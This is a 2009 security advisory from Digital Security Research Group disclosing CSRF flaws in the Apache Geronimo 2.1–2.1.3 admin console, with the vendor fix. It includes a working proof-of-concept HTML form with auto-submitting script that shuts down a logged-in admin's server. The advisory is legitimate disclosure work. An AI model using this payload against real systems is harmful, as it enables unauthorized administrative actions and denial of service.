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Apache Geronimo Cross Site Request Forgery

🗓️ 16 Apr 2009 00:00:00Reported by dsecrg.comType 
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Apache Geronimo XSRF Vulnerabilities in Versions 2.1 - 2.1.

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`Original Advisory: http://dsecrg.com/pages/vul/show.php?id=120  
  
  
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-020  
  
Application: Apache Geronimo Application Server  
Versions Affected: 2.1 - 2.1.3  
Vendor URL: http://geronimo.apache.org/  
Bug: Multiple XSRF Vulnerabilities  
Exploits: YES  
Reported: 10.12.2008  
Vendor response: 10.12.2008  
Solution: YES   
Date of Public Advisory: 16.04.2009  
CVE-number: 2009-0039  
Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)  
  
  
  
Description  
***********  
  
Geronimo Server Console multiple XSRF vulnerabilities.  
  
Various cross-site request forgery (XSRF or CSRF) vulnerabilities were identified in the Apache Geronimo web administration console.  
  
This affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to and including Geronimo 2.1.3.  
  
  
  
Details  
*******  
  
Exploiting this issue may allow a remote attacker to perform certain administrative actions, e.g. change web administration password, upload applications, etc... using predictable URL requests once the user has authenticated and obtained a valid session with the server.  
  
Example [Shutdown Server]:  
  
<html>  
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>  
<input type=hidden value='Shutdown' name="shutdown">  
<input type=submit>  
</form>  
</html>  
<script>  
document.getElementById(1).submit();  
</script>  
  
  
  
Solution  
********  
  
This security vulnerabilities fixed in Geronimo 2.1.4 release.  
  
New version of Geronimo 2.1.4 can be downloaded from this location:  
  
http://geronimo.apache.org/downloads.html  
  
An alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the administration web console application in the server.  
  
Credits  
*******  
  
http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214  
  
  
  
About  
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Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.   
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
Contact: research [at] dsecrg [dot] com  
http://www.dsecrg.com   
http://www.dsec.ru  
  
  
  
Regards,  
Digital Security Research Group [DSecRG]  
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